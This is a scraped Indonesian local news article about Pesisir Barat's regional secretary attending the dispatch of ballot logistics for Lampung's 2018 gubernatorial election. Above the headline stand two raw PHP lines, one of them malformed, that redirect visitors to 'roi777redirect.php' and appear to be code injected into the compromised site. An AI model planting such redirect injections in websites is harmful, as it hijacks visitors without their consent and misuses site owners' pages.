header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Azhari Hadiri Distribusi Logistik Pilkada -
Azhari Hadiri Distribusi Logistik Pilkada

translampung.com – Sekretaris daerah Kabupaten Pesisir Barat (Sekda Kab Pesibar) menghadiri acara pelepasan distribusi logistik pemilihan gubernur (Pilgub) dan (Wagub) wakil gubernur lampung 2018, mewakili Bupati Agus Istiqlal Pada hari minggu (24/6), di kantor komisi pemilihan umum (KPU) setempat.

Dalam sambutannya, Drs. Azhari, Mm menyampaikan atas nama pemerintah kabupaten Pesibar mengucapan selamat kepada ketua dan sekretaris beserta anggota KPU yang telah melaksanakan tahapan-tahapan Pilgub dan Wagub lampung tahun 2018 sesuai dengan peraturan KPU dan undang-undang yang berlaku.

“meliputi undang-undang RI nomor 10 tahun 2016 tentang perubahan kedua atas undang-undang nomor 1 tahun 2015 tentang penetapan peraturan pemerintah pengganti undang-undang nomor 1 tahun 2014 tentang pemilihan gubernur, bupati, dan walikota.
Peraturan KPU nomor 2 tahun 2018 perubahan atas peraturan kpu nomor 1 tahun 2017 tentang tahapan, program dan jadwal penyelenggaraan Pilgub dan Wagub, bupati dan wakil bupati, dan atau walikota dan wakil wali kota tahun 2018, “ujarnya.

Selain itu, berlandaskan hal tersebut diatas, Sekda Kab mengharapkan kepada ketua dan sekretaris beserta anggota KPU kabupaten Pesibar agar dalam pendistribusian logistik keseluruh kecamatan se-Pesibar dapat terlaksana dengan sesuai dan tepat sasaran. Marilah kita semua bahu membahu saling bergandengan tangan, hilangkan semua sentimen negatif dan prasangka buruk agar dalam pelaksanaan pesta demokrasi lima tahunan ini bisa berjalan dengan lancar tanpa ada satu kendala apapun.

” selain dari pada itu, dengan segala upaya pemerintah sai batin dan para ulama sangat mendukung penuh pesta demokrasi ini, sehingga semua lapisan masyarakat dan semua yang terkait didalamnya dapat berkontribusi melakukan pencoblosan ke TPS setempat, “tandasnya. (eko)

News Reporter